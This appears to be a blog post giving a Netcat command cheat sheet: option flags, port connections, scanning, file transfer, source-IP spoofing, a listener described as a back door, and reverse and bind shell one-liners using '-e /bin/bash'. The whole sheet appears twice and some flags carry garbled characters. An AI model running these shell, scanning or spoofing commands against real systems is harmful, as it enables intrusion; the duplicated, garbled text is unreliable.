Basic Netcat commands
-e prog inbound program to exec (dangerous!!)
-g gateway source-routing hop point(s), up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose (use twice to be more verbose)
-w secs timeout for connects and final net reads
-z zero-I/O mode (used for scanning)
port numbers can be individual or ranges: m-n (inclusive)
Connect to a port on
a remote host
nc remote_host <port>
Connect to multiple
ports on a remote host
nc remote_host <port>...<port>
For example:
nc www.somecompanyasanexample.com 21 25 80
Listen on a port for
incoming connections
(Also know as A Back Door)
nc -v -l -p <port>
Connect to remote host
and serve a bash shell
nc remote_ip <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option
Listen on a port and
serve a bash shell
upon connect
nc -v -l -p <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option
Port scan a remote
host
nc -v -z remote_host <port>-<port>
Use the -i flag to set a delay interval:
nc -Âœi <seconds> -v -z remote_host
<port>-<port>
Pipe command output
to a netcat request
<command> | nc remote_host <port>
For example:
echo "GET / HTTP/1.0
(enter)
(enter)
"| nc www.somecompanyasanexample.com 80
Use source-routing to
connect to a port on a
remote host
nc -Âœg <gateway> remote_host <port>
Note: Up to eight hop points may be specified using the -g flag.
Use the -ÂœG flag to specify the source-routing pointer.
Spoof source IP
address
Use the -Âœs flag to spoof the source IP address:
nc -s spoofed_ip remote_host port
This command will cause the remote host to respond back to the
spoofed IP address. The -Âœs flag can be used along with most of
the commands presented in this table.
Transfer a file
On the server host:
nc -v -l -p <port> < <file>
On the client host:
nc -v <server_host> <port> > <file>
It is also possible for the client host to listen on a port in order to
receive a file. To do this, run the following command on the client
host:
nc -v -l -p <port> > file
And run the following command on the server host:
nc -Âœv <client_host> <port> < file
These can all be used by your netcat
-g gateway source-routing hop point(s), up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose (use twice to be more verbose)
-w secs timeout for connects and final net reads
-z zero-I/O mode (used for scanning)
port numbers can be individual or ranges: m-n (inclusive)
Connect to a port on
a remote host
nc remote_host <port>
Connect to multiple
ports on a remote host
nc remote_host <port>...<port>
For example:
nc www.somecompanyasanexample.com 21 25 80
Listen on a port for
incoming connections
(Also know as A Back Door)
nc -v -l -p <port>
Connect to remote host
and serve a bash shell
nc remote_ip <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option
Listen on a port and
serve a bash shell
upon connect
nc -v -l -p <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option
Port scan a remote
host
nc -v -z remote_host <port>-<port>
Use the -i flag to set a delay interval:
nc -Âœi <seconds> -v -z remote_host
<port>-<port>
Pipe command output
to a netcat request
<command> | nc remote_host <port>
For example:
echo "GET / HTTP/1.0
(enter)
(enter)
"| nc www.somecompanyasanexample.com 80
Use source-routing to
connect to a port on a
remote host
nc -Âœg <gateway> remote_host <port>
Note: Up to eight hop points may be specified using the -g flag.
Use the -ÂœG flag to specify the source-routing pointer.
Spoof source IP
address
Use the -Âœs flag to spoof the source IP address:
nc -s spoofed_ip remote_host port
This command will cause the remote host to respond back to the
spoofed IP address. The -Âœs flag can be used along with most of
the commands presented in this table.
Transfer a file
On the server host:
nc -v -l -p <port> < <file>
On the client host:
nc -v <server_host> <port> > <file>
It is also possible for the client host to listen on a port in order to
receive a file. To do this, run the following command on the client
host:
nc -v -l -p <port> > file
And run the following command on the server host:
nc -Âœv <client_host> <port> < file
These can all be used by your netcat
0 comments:
Post a Comment